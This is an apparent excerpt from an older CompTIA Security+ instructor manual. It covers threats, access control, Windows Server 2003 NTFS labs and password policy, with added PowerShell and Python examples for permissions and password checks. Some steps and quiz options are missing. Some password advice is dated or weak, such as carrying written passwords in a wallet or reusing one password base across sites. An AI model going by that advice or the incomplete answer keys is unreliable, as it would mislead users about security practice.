ILT Series
COPYRIGHT Axzo Press. All rights reserved. No part of this work may be reproduced, transcribed, or used in any form or by any means, graphic, electronic, or mechanical, including photocopying, recording, taping, Web distribution, or information storage and retrieval systems, without the prior written permission of the publisher. For more information, go to www.courseilt.com.
Trademarks
ILT Series is a trademark of Axzo Press. Some of the product names and company names used in this book have been used for identification purposes only and may be trademarks or registered trademarks of their respective manufacturers and sellers.
Disclaimer
We reserve the right to revise this publication and make changes from time to time in its content without notice.
CompTIA Security+ Certification

Contents

Introduction
    Topic A: About the manual  vi
    Topic B: Setting student expectations  xi
    Topic C: Classroom setup  xix
    Topic D: Support  xxvii

Security overview  1-1
    Topic A: Introduction to network security  1-2
    Topic B: Understanding security threats  1-5
    Topic C: Creating a secure network strategy  1-9
    Topic D: Windows Server 2003 server access control  1-13
    Unit summary: Security overview  1-24

Authentication  2-1
    Topic A: Introduction to authentication  2-2
    Topic B: Kerberos  2-8
    Topic C: Challenge Handshake Authentication Protocol  2-14
    Topic D: Digital certificates  2-16
    Topic E: Security tokens  2-19
    Topic F: Biometrics  2-22
    Unit summary: Authentication  2-30

Attacks and malicious code  3-1
    Topic A: Denial of service attacks  3-2
    Topic B: Man-in-the-middle attacks  3-15
    Topic C: Spoofing  3-18
    Topic D: Replays  3-25
    Topic E: TCP session hijacking  3-27
    Topic F: Social engineering  3-29
    Topic G: Attacks against encrypted data  3-32
    Topic H: Software exploitation  3-37
    Unit summary: Attacks and malicious code  3-51

Remote access  4-1
    Topic A: Securing remote communications  4-2
    Topic B: Authentication  4-5
    Topic C: Virtual private networks  4-16
    Topic D: Telecommuting vulnerabilities  4-27
    Unit summary: Remote access  4-31

E-mail  5-1
    Topic A: Secure e-mail and encryption  5-2
    Topic B: PGP and S/MIME encryption  5-13
    Topic C: E-mail vulnerabilities  5-24
    Unit summary: E-mail  5-30

Web security  6-1
    Topic B: Vulnerabilities of Web tools  6-15
    Topic C: Configuring Internet Explorer security  6-30
    Unit summary: Web security  6-40

Directory and file transfer services  7-1
    Topic A: Introduction to directory services  7-2
    Topic B: File transfer services  7-10
    Topic C: File sharing  7-25
    Unit summary: Directory and file transfer services  7-28

Wireless and instant messaging  8-1
    Topic A: IEEE 802.11  8-2
    Topic B: WAP 1.x and WAP 2.0  8-10
    Topic C: Wired equivalent privacy  8-23
    Topic D: Instant messaging  8-36
    Unit summary: Wireless and instant messaging  8-42

Network devices  9-1
    Topic A: Understanding firewalls  9-2
    Topic B: Routers  9-9
    Topic C: Switches  9-16
    Topic D: Telecom, cable modem, and wireless devices  9-19
    Topic E: Securing remote access  9-23
    Topic F: Intrusion detection systems  9-26
    Topic G: Network monitoring  9-29
    Unit summary: Network devices  9-36

Transmission and storage media  10-1
    Topic A: Transmission media  10-2
    Topic B: Storage media  10-11
    Unit summary: Transmission and storage media  10-19

Network security topologies  11-1
    Topic A: Security topologies  11-2
    Topic B: Network Address Translation  11-7
    Topic C: Tunneling  11-21
    Topic D: Virtual Local Area Networks  11-23
    Unit summary: Network security topologies  11-29

Intrusion detection  12-1
    Topic A: Intrusion detection systems  12-2
    Topic B: Network-based and host-based IDS  12-5
    Topic C: Active and passive detection  12-14
    Topic D: Honeypots  12-20
    Topic E: Incident response  12-25
    Unit summary: Intrusion detection  12-28

Security baselines  13-1
    Topic A: OS/NOS hardening  13-2
    Topic B: Network hardening  13-14
    Topic C: Application hardening  13-23
    Topic D: Workstations and servers  13-43
    Unit summary: Security baselines  13-55

Physical security  15-1
    Topic A: Access control  15-2
    Topic B: Environment  15-12
    Unit summary: Physical security  15-18

Disaster recovery and business continuity  16-1
    Topic A: Disaster recovery  16-2
    Topic B: Business continuity  16-11
    Topic C: Policies and procedures  16-14
    Topic D: Privilege management  16-24
    Unit summary: Disaster recovery and business continuity  16-28

Computer forensics and advanced topics  17-1
    Topic A: Understanding computer forensics  17-2
    Topic B: Risk identification  17-9
    Topic C: Education and training  17-11
    Topic D: Auditing  17-14
    Topic E: Documentation  17-17
    Unit summary: Computer forensics and advanced topics  17-21

A-1
    Topic A: Comprehensive exam objectives  A-2

Course summary  S-1
    Topic A: Course summary  S-2
    Topic B: Continued learning after class  S-7

Glossary  G-1
Index  I-1
ramifications.
C Determine the factors involved in creating
server.
Security overview

Today, companies are achieving a balance by keeping the bad guys out with increasingly complex ways of letting the good guys in.

Managing risk

Security is critical for all types of Internet businesses. By protecting high-availability systems from intrusion and corruption, security technologies help companies build trust with their employees, suppliers, partners, and customers: a trust that information is protected and transactions are reliable. When most people talk about security, they mean ensuring that users:
1 Can perform only tasks they are authorized to do
2 Can obtain only information they are authorized to have
3 Cannot cause damage to the data, applications, or operating environment of a system
The word security connotes protection against malicious attack by outsiders; security also involves controlling the effects of errors and equipment failures. Anything that can protect against an attack can prevent random misfortune as well.
Do it! A-1:
3 Integrity is maintained when the message sent is identical to the message received. True or false?
True
4 Confidentiality is the protection of data from authorized disclosure to a third party. True or false?
False: It is the protection of data from unauthorized disclosure to a third party.
Sources of threats
There are four primary causes for compromised security:
Technology weaknesses
Configuration weaknesses
Policy weaknesses
Human error or malice
Technology weaknesses
Computer and network technologies have intrinsic security weaknesses in the following areas:
TCP/IP: A communication protocol suite for routed networks, TCP/IP was designed as an open standard to facilitate communications. Due to its wide usage, there are plenty of experts and expert tools that can compromise this open technology. It cannot guard a network against message-modification attacks or protect connections against unauthorized-access attacks.
Operating systems: Systems such as UNIX, Linux, Windows NT and 95, and OS/2 need the latest patches, updates, and upgrades applied to protect users.
Network equipment: Routers, firewalls, and switches must be protected through the use of password protection, authentication, routing protocols, and firewalls.
Configuration weaknesses
Even the most secure technology can be misconfigured. Security problems are often caused by one of the following configuration weaknesses:
Unsecured accounts: User account information might be transmitted insecurely across the network, exposing usernames and passwords to sniffers, which are programs for monitoring network activity, capable of capturing and analyzing IP packets on an Ethernet network or dial-up connection.
System accounts with easily guessed passwords: Poorly administered password policies can cause problems in this area.
Misconfigured Internet services: A common problem is to turn on Java and JavaScript in Web browsers, enabling attacks via hostile Java applets. Another problem is putting high-security data on a Web server; this type of data (social security numbers, credit card numbers) should be behind a firewall and require user authentication and authorization to access.
Unsecured default settings: Many products have default settings that enable security holes (for example, UNIX sendmail and X Windows).
Misconfigured network equipment: Misconfiguration of network devices can cause significant security problems. For example, misconfigured access lists, routing protocols, or Simple Network Management Protocol (SNMP) community strings can open up large security holes.
Trojan horse programs: Delivery vehicles for destructive code, these appear to be harmless programs but are enemies in disguise. They can delete data, mail copies of themselves to e-mail address lists, and open up other computers for attack.
Vandals: These software applications or applets can destroy a single file or a major portion of a computer system.
Viruses: These are the largest threat to network security and have proliferated in the past few years. They are designed to replicate themselves and infect computers when triggered by a specific event. The effect of some viruses is minimal and only an inconvenience, while others are more destructive and cause major problems, such as deleting files or slowing down entire systems.
Human error and malice
Human error and malice constitute a significant percentage of breaches in network security. Even well-trained and conscientious users can cause great harm to security systems, often without knowing it. Well-intentioned users can contribute to security breaches in several ways:
Accident: The mistaken destruction, modification, disclosure, or incorrect classification of information.
Ignorance: Inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge. Users might inadvertently give information on security weaknesses to attackers.
Workload: Too many or too few system administrators.
Conversely, ill-willed employees or professional hackers and criminals can access valuable assets through deceit:
Dishonesty: Fraud, theft, embezzlement, and the selling of confidential corporate information.
Impersonation: Attackers might use the telephone to impersonate employees to persuade users or administrators to give out usernames, passwords, modem numbers, and so on.
Disgruntled employees: Those who have been fired, laid off, or reprimanded might infect the network with a virus or delete files. Usually one of the largest security threats, these people know the network and the value of the information on it.
Snoops: Individuals who take part in corporate espionage by gaining unauthorized access to confidential data and providing this information to competitors.
Denial-of-service attacks: These attacks engulf network equipment with useless noise, thereby causing systems to slow down or even crash.
Do it! B-1:
2 What is a crime called in which one person masquerades under the identity of another?
4 Trojan horses are destructive programs that masquerade as benign applications. True or false?
True
Unsecured accounts
Misconfigured Internet services
Misconfigured access lists
Human ignorance
Knowing your weaknesses
Every security system has vulnerabilities. Attack your own system to determine where your weaknesses are located. Once you identify your weaknesses, you can plug those holes effectively. Determine the areas that present the largest danger to your system and prevent access to them immediately. Add more security to these areas. Is your weakness an internal server, a firewall, a router, or improperly trained staff? Develop a methodology for testing and ensuring your systems remain safe.
Limiting access
The security of a system is only as good as the weakest security level of any single host in the system. Not everyone needs to have authorization to every folder or document. Segment your network users, files, and servers. For example, staff members in the Accounting Department do not need access to personnel files in the Human Resource Department. The default access should be no access. From there, you open holes with permissions and authentication allowing authorized users to access resources. If you start from this premise, it's easier than starting from open access.
Achieving security through consistency
Develop a change management process around your network. Whenever there are network upgrades, whether patches, the addition of new users, or updating a firewall, you should document the process and procedures. If you are thorough in documenting the process, you limit your security risks. When you add new users to the network, do you always do the same thing? What if you forget a step? Is your security breached? Be methodical and follow a written process.
Physical security
It makes no sense to install complicated software security measures when access to the hardware is not controlled. Require authorization into your network room and the different closets in which network equipment is kept; otherwise, unauthorized users can easily access and destroy network equipment in seconds.
Perimeter security
Perimeter security is controlling access to critical network applications, data, and services. The services offered include secure Web and file servers, gateways, remote access, and naming services. Each organization should be prepared to select perimeter security tools based on their network requirements and budget. Along with the network, for successful perimeter security, blueprints for all campus grounds and buildings are necessary. In addition, all hardware, PCs, and software components must be documented.
Firewalls
A firewall is a hardware or software solution that contains programs designed to enforce an organization's security policies by restricting access to specific network resources. The firewall creates a protective layer between the network and the outside world. The firewall has built-in filters that can be configured to deny unauthorized or dangerous materials from entering the network. Firewalls log attempted intrusions and create reports.
Organizations must test mission-critical hosts, workstations, and servers for vulnerabilities. Determine if your organization has the in-house expertise and experience to successfully test the network. If not, outsourcing to a reputable security assessment organization is recommended.
Access control
Access control ensures that legitimate traffic is allowed into or out of your network. This is done by having users identify themselves via passwords to prove their identity at login. In addition, access must be permitted or denied for each application, function, and file. Most attacks against networks are instances when unauthorized people find a way through the login system. This type of attack happens by guessing or stealing a user identity that is recognized by the system. These attacks are successful because existing networks utilize access control systems, which merely involve entering a user identity together with a password. With this limited security, attacks are simple and common. Many systems do not log invalid password entries into their systems, allowing an attacker to be more persistent. Hackers can continue trying different passwords repeatedly without being noticed. Another type of access control is personal identification numbers (PINs). These are commonly used at banks. The only difference between passwords and PINs is that PINs are usually all numeric and only a few characters long. Security tokens are gaining popularity as well. This hardware plugs into computing devices and dynamically generates a new password at each login. This is done automatically for the user once the user authenticates with a password. Smartcards, with embedded chips, contain code that identifies the holder, or contain keys that can read and send encrypted data. These cards are becoming more popular and are very useful for maintaining security.
Change management
Change management is a set of procedures developed by network staff that are followed whenever a change is made to the network. Most organizations focus on servers and do not document changes to the backbone, which touches the entire network infrastructure. It is important to document changes to all areas of your IT infrastructure.
Encryption
Encryption ensures messages cannot be intercepted or read by anyone other than their intended audience. Encryption is usually implemented to protect data that is transported over the public network; it uses advanced algorithms to scramble messages and their attachments.
Intrusion detection systems
An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes packet data streams within the network and searches for unauthorized activity. When unauthorized activity is detected, the IDS can send alarms to a management console with details of the activity and can order other systems to cut off the unauthorized session.
Do it! C-1:
Knowing your weaknesses
Determining the cost
Remembering human factors
Controlling secrets
All of the above

Restricts access to specific network resources
Contains built-in filters
Creates a protective layer between the network and the outside world
Is a hardware only solution
DAC
Discretionary access control (DAC) allows an owner of a file to dictate who can access the file and to what extent. The owner of the resource creates an access control list (ACL) to list the users with access and the type of access (permissions). Most operating systems provide some form of the read, write, execute, modify, and delete permissions. One of the drawbacks to this method is that each owner controls the access levels to his or her personal files. With inappropriate access control, confidential information can be accidentally or deliberately compromised, or resources can be rendered inaccessible. The assumption is that the owner of the file has the expertise to manage the access levels appropriately.
RBAC
Role-based access control (RBAC), not to be confused with rule-based access control, is based on the role a user plays in the organization. Instead of giving access to individual users, access control is granted to groups of users who perform a common function. This allows for centralized administration, where access to resources is defined based on roles, and each user is assigned one or more roles. This is considered a nondiscretionary access control.
D-1:
Here's how
Tell students this activity will show them how to determine whether a file partition is FAT or NTFS, as well as how to convert a FAT partition to NTFS.
1 Log on to the Windows Server 2003 server as Administrator
2 Click Start, choose Run, type cmd, and press Enter
To access the command window.
To determine whether a file partition is FAT or NTFS. You will see the message "The type of the file system is FAT32. E: is not dirty." This indicates that NTFS was not yet installed and there is no corruption on the drive.
The FAT partition in this lab will be designated as drive letter E. However, if you have more drives installed, this might be a higher letter than E:. Be sure students do not change drive C:.
5 If the drive has a volume label, enter it when prompted
6 At the command line, enter chkntfs e:
7 Enter exit
Data confidentiality
Explanation After a secure file system is installed, you can begin to think about data confidentiality. Data confidentiality refers to making sure only those intended to have access to certain data actually have that access. With the FAT file system, this is not possible at the local level, but with NTFS, you can lock down both folders and files locally. NTFS can be used to protect data from intruders who might have physical access to the computer containing the data. Exhibit 1-1 shows the default NTFS permissions.
Exhibit 1-1: Default NTFS permissions on a Windows Server 2003 server

Do it! D-2:
Here's how
In this activity, students will create a folder and files, assign NTFS permissions, and then verify whether the data is confidential.
2 Create a new folder called Confidentiality
3 Double-click the Confidentiality folder
4 Create a new folder called User1Folder
5 Right-click User1Folder and choose Properties
6 Activate the Security tab
The User1Folder Properties screen appears. The Security tab is displayed, as shown in Exhibit 1-1.
To retain the permissions. To return to the Security tab. To start the process of adding access permissions for User1. The Select Users or Groups window appears.
Click OK twice
14 With User1 still highlighted, select Allow for Full Control
15 Select each group in the list of Group or user names and click Remove for each group, then click OK
To remove the Administrators, Creator Owner, System and Users groups from the access control list. Do not remove User1. To save the changes.
16 Double-click User1Folder
You are denied access because you granted access to the folder only to User1.
17 Close all windows and log off
18 Log on as User1 and navigate to the User1Folder
To verify that User1 has access to the folder. You should be able to open the folder.
19 Close all windows and log off
Data availability
Explanation Although it is important that data remains secure and confidential, it is just as important that the data is available when needed. Secured data that is inaccessible results in downtime and is detrimental to a business and its ability to serve customers. Technologies such as clustering and load balancing can help, but if NTFS permissions are assigned inappropriately, these features will not remedy the situation.
Do it! D-3:
Here's how
In this activity, students will examine how NTFS permissions affect a user's access to resources.
1 Log on to the Windows Server 2003 server as Administrator
2 Open My Computer and double-click the E: drive
3 Create a new folder called Availability
4 Double-click the Availability folder
5 Create a folder called User2Folder
6 Right-click User2Folder and choose Properties
To open the User2Folder Properties window.
7 Activate the Security tab
8 Click Advanced
9 Clear "Allow inheritable permissions from parent to propagate to this object and all child objects. Include these with entries explicitly defined here."
You'll be prompted to Copy, Remove, or Cancel.
To clear the permissions. To return to the Security tab. To acknowledge the Security message and continue. To open the Select Users or Groups window.
15 Click Find Now, select User2, and click OK twice
You might have to scroll to see the user. To add User2 to the access control list.
16 With User2 still highlighted, select Allow for Full Control and click OK
To assign User2's permissions.
17 Close all windows and log off
Point out to students that User2 does not require a password to log on.
18 Log on as User2
19 Verify that you have access to e:\Availability\User2Folder
20 Close all windows and log off
21 Log on as Administrator
22 Delete the User2 account from the local security database
23 Create a new user, also named User2
Click Start, right-click My Computer and choose Manage. Expand Local Users and Groups. Select Users and delete User2. With Users selected, choose Action, New User. Enter User2 as the User name, clear "User must change password at next logon" and click Create. Click Close.
Notice that the User2 account is no longer listed, but the account's SID is.
25 Log on as User2 and try to access e:\Availability\User2Folder
26 Close all windows and log off
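The permission setup of activities D-2 and D-3, and the orphaned-SID effect that step 25 demonstrates, can be reproduced and checked from the command line. This is an added PowerShell example, not part of the course manual; it assumes the lab layout above (NTFS volume E:, a local account User2, the folder E:\Availability\User2Folder), that Windows PowerShell is available and run as Administrator on the lab server, and the function names (Grant-ExclusiveFullControl, Find-OrphanedAce, Repair-OrphanedAce) are chosen for this example.

```powershell
# Added example, not from the course manual. Assumes the D-3 lab layout:
# NTFS volume E:, local account User2, folder E:\Availability\User2Folder,
# Windows PowerShell run as Administrator on the lab server.
$folder  = 'E:\Availability\User2Folder'
$account = "$env:COMPUTERNAME\User2"

function New-FullControlRule {
    param([string]$Principal)
    # Full Control, inherited by subfolders and files (ContainerInherit, ObjectInherit)
    New-Object System.Security.AccessControl.FileSystemAccessRule(
        $Principal,
        [System.Security.AccessControl.FileSystemRights]::FullControl,
        [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit',
        [System.Security.AccessControl.PropagationFlags]::None,
        [System.Security.AccessControl.AccessControlType]::Allow)
}

# Steps 8-16 of D-3 as code: stop inheriting from E:\Availability, discard the
# inherited entries (the "Remove" choice), then grant only User2 Full Control.
function Grant-ExclusiveFullControl {
    param([string]$Path, [string]$Principal)
    $acl = Get-Acl -Path $Path
    # $true = protect from inheritance; $false = do not copy the inherited rules
    $acl.SetAccessRuleProtection($true, $false)
    $acl.AddAccessRule((New-FullControlRule -Principal $Principal))
    Set-Acl -Path $Path -AclObject $acl
}

# The check behind steps 22-25. NTFS stores the SID, not the name, so an ACE for
# a deleted account survives as an unresolvable SID, and a recreated account with
# the same name (but a new SID) is denied. Lists every ACE whose SID no longer maps.
function Find-OrphanedAce {
    param([string]$Path)
    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        # IdentityReference is an NTAccount when resolvable, otherwise already a SID
        $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier])
        try {
            $null = $sid.Translate([System.Security.Principal.NTAccount])
        } catch {
            # Translate throws IdentityNotMappedException for a deleted account
            New-Object PSObject -Property @{
                Path   = $Path
                Sid    = $sid.Value
                Rights = $ace.FileSystemRights
            }
        }
    }
}

# Remediation: purge the orphaned ACE(s) and grant the recreated account instead.
function Repair-OrphanedAce {
    param([string]$Path, [string]$Principal)
    $acl = Get-Acl -Path $Path
    foreach ($orphan in @(Find-OrphanedAce -Path $Path)) {
        $acl.PurgeAccessRules([System.Security.Principal.SecurityIdentifier]$orphan.Sid)
    }
    $acl.AddAccessRule((New-FullControlRule -Principal $Principal))
    Set-Acl -Path $Path -AclObject $acl
}

# Usage, in the order the lab runs:
Grant-ExclusiveFullControl -Path $folder -Principal $account      # before step 17
# ... delete and recreate User2 (steps 22-23), then:
Find-OrphanedAce -Path $folder | Format-Table Sid, Rights -AutoSize
# The recreated account's SID differs from the one the ACL still holds,
# which is why step 25 is denied:
([System.Security.Principal.NTAccount]$account).Translate(
    [System.Security.Principal.SecurityIdentifier]).Value
Repair-OrphanedAce -Path $folder -Principal $account
```

Orphaned SIDs also show up as raw S-1-5-21-... entries on the Security tab, which is what step 24 of the lab has students observe in the GUI.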
Data integrity
Explanation After data is secured properly and available to the appropriate people, it is important to make sure the contents of the data have not been altered accidentally or intentionally. Malicious corruption is a problem and can be caused by a virus, worm, or hacker. Accidental changes, however, can also damage data integrity. For example, Windows Server 2003 file synchronization capabilities could easily lead to accidental corruption. Changes made to data that conflict with other changes to the same data could damage data integrity just as much as a hacker can. Environmental problems can also lead to data integrity issues; such problems include dust, surges, and excessive heat. Windows Server 2003 default permissions are configured in such a way that only the creator of a file and users who belong to the System Administrators group can change a file by default. Members of the Users group can view a file by default, but cannot make changes. To enable others to change a file, permissions have to be specifically assigned.
D-4:
Here's how
1 Log on to the Windows Server 2003 server as User1
2 In My Computer, display the E: drive
3 Create a new folder called Integrity
4 Within the Integrity folder, create a new folder called User1Folder
5 Within User1Folder, create a new text document
6 Type "This document has not been modified accidentally or intentionally."
8 Close the document
9 Log off User1
10 Log on as User2
11 Navigate to e:\Integrity\User1Folder
12 In the New Text Document, remove the word "not"
13 Try to save the file to save the changes
You did not change the default permissions on e:\Integrity\User1Folder, so you can still view the contents of the file as User2. You receive an error message that you can't save the file. The data integrity of the file is maintained.
14 Close all windows and log off User2
Data encryption
Explanation With NTFS, you are not limited to folder- and file-level security. Another function of NTFS is the ability to encrypt data. Encryption is the process of taking readable data and making it unreadable. Encryption is commonly used for remote data transfer, but it can also be used for local security. Laptop users might want to use NTFS to secure and encrypt their data in the event the laptop is stolen. While this solution is not 100% effective, it does make it more difficult to hack into your system. Windows Server 2003 offers a very easy way to encrypt files on an NTFS partition.
Do it! D-5:
Here's how
This activity demonstrates how to encrypt data within a file.
1 Log on to the Windows Server 2003 server as User2
2 In My Computer, open the E: drive
3 Create a new folder called Encryption
4 Within the Encryption folder, create a new folder called User2Folder
5 Within User2Folder, create a new text document and edit the content to read "This document is for my eyes only."
10 Select the "Encrypt the file only" radio button and click OK
11 Log off as User2
12 Log on as User1
13 Try to access the Private Document file in e:\Encryption\User2Folder
Access should be denied. You'll also notice the file name displays in green to indicate it's been encrypted.
14 Log off User1
Review questions
1 What file systems are compatible with Windows NT 4.0?
A FAT
B FAT32
C OSPF
D NTFS
2 Which of the following commands will convert a FAT partition to NTFS?
A update C: /FS:NTFS
B upgrade C: /FS:NTFS
C convert C: /FS:NTFS
D convert C: /NTFS
3 Which of the following is the best definition of data confidentiality?
A Data that has not been tampered with intentionally or accidentally
B Data that has been scrambled for remote transmission
C
D Data that can be accessed when it is needed
4 Which of the following is the best definition of data availability?
A Data that has not been tampered with intentionally or accidentally
B Data that has been scrambled for remote transmission
C Data that is secured so only the intended people have access
D
5 How can data confidentiality affect data availability?
A They are two independent areas and do not affect each other
B For data to be available, it cannot be confidential
C Data that is secured too strongly might conflict with the availability
D Data that is secured too weakly might conflict with the availability
6 Which of the following is the best definition of data integrity?
A
B Data that has been scrambled for remote transmission
C Data that is secured so only the intended people have access
D Data that can be accessed when it is needed
7 Which of the following can damage data integrity? (Choose all that apply.)
A
B
C
D
8 Data integrity can also be threatened by environmental hazards such as dust, surges, and excessive heat. True or false?
True
9 Which of the following is the best definition of encryption?
A Data that has not been tampered with intentionally or accidentally
B
C Data that is secured so only the intended people have access
D Data that can be accessed when it is needed
Unit 2 Authentication
Unit time: 120 minutes
Complete this unit, and you'll know how to:
A Create strong passwords and store them securely.
B Discuss the Kerberos authentication process.
C Explain how CHAP works.
D Explain how digital certificates are created
function.
F Explain the biometric authentication processes.
Authentication
Explanation Security of system resources generally follows a three-step process of authentication, authorization, and accounting (AAA). This AAA model begins with positive identification of the person or system seeking access to secured information or services (authentication). That person is granted a predetermined level of access to the resources (authorization), and the use of each asset is then logged (accounting). The most critical step in the process is authentication. Without a positive identification, other steps are worthless, because they cannot distinguish between the authorized user and an imposter. The amount of security implemented in the authentication process should be proportional to the value of the resources being protected. As our dependence on computer network systems has increased, so has our willingness to pay for stronger authentication technologies to secure against attack.
With increasing numbers of sites requiring authorization, users often choose to reuse the same simplistic password on multiple sites, aggravating the vulnerabilities of the authentication keys of which such passwords are a part.
Password protection guidelines
The proliferation of computing has led to the use of weak personal password techniques. These weak techniques are the crux of the problem with passwords. We are now operating in a digital environment in which the bad guys use faster and more capable computers and applications to violate our computer systems; because of this, we need to construct, use, and store our passwords more carefully. There are many different password conventions, but there are five basic rules to follow in order to safeguard your passwords:
Passwords must be memorized. If they must be written down, the written records must be locked up.
For multiple applications, each password you choose must be different from any other you use.
Passwords must be at least six characters long, and preferably longer, depending on the size of the character set used.
Passwords must contain a mixture of letters (both uppercase and lowercase, if the operating system supports case-sensitive passwords), numbers, and other characters, such as %, !, or &.
Passwords must be changed periodically.
Some operating systems, such as NetWare, do not recognize the difference between uppercase and lowercase letters.
Strong password creation techniques
It is important to choose passwords that are easy to remember but difficult to recognize. One way to do this is to think of a simple phrase or the words to a song that can be easily remembered, such as April showers bring Might flowers. Use the first letters of each word and add a number and a punctuation mark or another character, which might give you Asb4Mf? Another technique is to combine two dissimilar words and place a number between them, such as SleigH9ShoE. One can also substitute numbers for letters, but this should be done carefully. Replacing the words to and for with their numeric synonyms, 2 and 4, is a fairly obvious ploy to most hackers. An all too frequent example of this simple substitution process is pa55w0rd: a five is just a reformatted S, and a zero could easily be the letter O. Most password cracking utilities check for these types of well-known substitutions. The key is that your password means something to you and that it is a strong password, one that cannot be easily guessed or quickly discovered using a brute force attack (the process of systematically trying every possible combination of characters until the correct combination is found).
Techniques to use multiple passwords
People often have access to many different systems, each requiring a username/password set.
It is recommended that you use a different password every time one is required, but you can also group different Web sites or applications by their appropriate level of security and use a different password for each of those groups, while taking care to actually use a different password for each of the more critical Web sites (for example, those of financial institutions) and applications (for example, financial software).
Have each student devise a strong password and write it down on a piece of paper along with their name. Collect the papers and after several more minutes of discussion, have each student recall their password. You be the judge as to whether the password qualifies as strong.
For example, one lower-level group might be made up of the various news and weather-related Web sites you visit. If someone were to obtain your password to these sites, it would do you no real harm. Another method is to cycle your more complex passwords down the groups, from most sensitive to least. This allows you to reduce the total number of passwords that you are using while giving you time to work with a given password (and remember it) before relegating it for use in the more insecure password entry fields that you might encounter. You might also try using a common password base, but change parts of the password depending on where you are required to use it. For example, you could take the password ToRn71@L (sort of like torrential) and, depending on the Web site, change the T, R, and L to NoYn71@T for the New York Times Web site and SoAn71@N for the SANS Institute Web site.
Storing passwords
If you must write a list of your various passwords down on paper, keep the piece of paper close to you in an item that you are not likely to lose sight of, such as a purse or wallet. These passwords should be written in very small type to minimize the chance of someone else reading the information. Another good practice is to develop a personal code to apply to your password list. For instance, the first three characters of each password might be transposed and moved to the end of the password string, and the hostname might be moved down one place in the list, lining it up with the password for a different server. The individual who owns this written password card would have no problem quickly decoding the information, but it adds a small delay for anyone who would maliciously use the information. If you keep this list electronically, encrypt the password list with Windows 2000/Server 2003/XP encryption or some application that is specifically designed for this purpose.
Password protect the encrypted file with a strong password (different from your login password) and never electronically store the password that gains access to the file.
Specifying a minimum length for passwords. Short passwords or blank passwords are easy to crack.
Setting the password complexity to require use of at least three of the following: one number, one uppercase letter, one lowercase letter, or one symbol. Combining password length with complexity is the method recommended by security professionals.
Implementing an account lockout policy. The account lockout policy will disable an account for a specific amount of time after a certain number of failed logon attempts.
To prevent display of the last logon name in Windows Server 2003, modify the local security policy and change the Interactive logon: Do not display last user name option to Enabled.
Do it!
A-1:
Here's how
1 Log on to the Windows Server 2003 server as Administrator
2 Click Start
Choose Administrative Tools, Local Security Policy
6 Select Enabled
Click OK
7 Close all windows and log off
8 Press Ctrl+Alt+Del
Notice the User name field is empty in the logon screen.
Do it!
A-2: Using the Windows Server 2003 local password policy settings for length
Here's how
1 Log on to the Windows Server 2003 server as Administrator
2 Click Start
Choose Administrative Tools, Local Security Policy
Change the characters value to 9
6 Click OK
7 Close all windows and log off
8 Log on as User1
9 Press Ctrl+Alt+Del
Tell students this step is not meant to be successful.
10 Click Change Password
In both the New Password and Confirm New Password text boxes, type a new password of less than 9 characters
Click OK
A message appears stating that your password must be at least 9 characters long, cannot repeat any of your previous 0 passwords, and must be at least 0 days old. To change the password.
Password complexity
Explanation Finally, to set the password complexity in Windows Server 2003, modify the local security policy and change the Passwords must meet complexity requirements option.
Do it!
A-3: Using the Windows Server 2003 local password policy settings for complexity
Here's how
1 Log on to the Windows Server 2003 server as Administrator
2 Click Start
Choose Administrative Tools, Local Security Policy
3 Expand Account Policies
4 Select Password Policy
5 Double-click Password must meet complexity requirements
Select Enabled
6 Click OK
7 Close all windows and log off
8 Log on as User1
9 Press Ctrl+Alt+Del
10 Click Change Password
In the Old Password box, type password1
In the New Password box and Confirm New Password box, type password321
Review the entire message with your students.
A message box appears, indicating restrictions and steps for completing the password change. The password change is successful. Changing the p in password to a capital P caused the password to meet the password complexity requirements.
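To make the rules from this topic concrete, here is an added Python example (not code from the manual): it applies the 9-character minimum set in activity A-2, the three-of-four character-class rule, and the text's warning that well-known substitutions such as pa55w0rd are what cracking utilities try first. The wordlist and the substitution table are constructed for the example; note that Password321 satisfies the Windows policy but still fails the guessability check.

```python
import re

# Settings taken from this topic: activity A-2 sets the minimum to 9 characters,
# and the Windows complexity setting requires three of the four character classes.
MIN_LENGTH = 9
REQUIRED_CLASSES = 3

# Well-known substitutions a rule-based cracker undoes first (the text's
# pa55w0rd example: 5 for s, 0 for o). Assumed table for this example.
LEET_MAP = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s", "!": "i"})

# Constructed stand-in for a cracking wordlist.
DICTIONARY = {"password", "letmein", "welcome", "admin", "torrential"}


def character_classes(pw: str) -> set:
    """Which of the four complexity classes the password uses."""
    classes = set()
    if re.search(r"[A-Z]", pw):
        classes.add("upper")
    if re.search(r"[a-z]", pw):
        classes.add("lower")
    if re.search(r"[0-9]", pw):
        classes.add("digit")
    if re.search(r"[^A-Za-z0-9]", pw):
        classes.add("symbol")
    return classes


def meets_windows_policy(pw: str) -> bool:
    """Length plus three-of-four complexity, as configured in activities A-2 and A-3."""
    return len(pw) >= MIN_LENGTH and len(character_classes(pw)) >= REQUIRED_CLASSES


def is_obvious_substitution(pw: str) -> bool:
    """True when stripping trailing digits and undoing leet-style substitutions
    leaves a dictionary word, which is exactly what a cracking utility tries first."""
    base = re.sub(r"\d+$", "", pw)           # password321 -> password
    base = base.translate(LEET_MAP).lower()  # pa55w0rd -> password
    return base in DICTIONARY


def evaluate(pw: str) -> dict:
    """Policy result plus a guessability verdict; 'strong' needs both to pass."""
    policy_ok = meets_windows_policy(pw)
    obvious = is_obvious_substitution(pw)
    return {"policy_ok": policy_ok, "classes": sorted(character_classes(pw)),
            "obvious_substitution": obvious, "strong": policy_ok and not obvious}


if __name__ == "__main__":
    for candidate in ["password321", "Password321", "pa55w0rd", "SleigH9ShoE"]:
        print(candidate, evaluate(candidate))
```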
Topic B: Kerberos
This topic covers the following CompTIA Security+ exam objective:
1.2 Recognize and be able to differentiate and explain the following methods of authentication: Kerberos, Mutual
Introducing Kerberos
Explanation In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a five-year project to incorporate computers into the MIT curriculum. As part of the project, a leading-edge network authentication protocol was developed. It was named Kerberos, after the three-headed dog that guarded the entrance to Hades in Greek mythology. In 1989, version 4 was publicly released as open source code. Although Kerberos 4 is still in use in a few environments, Kerberos 5 is the standard today. As of this writing, the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S. and Canada from the following Web page:
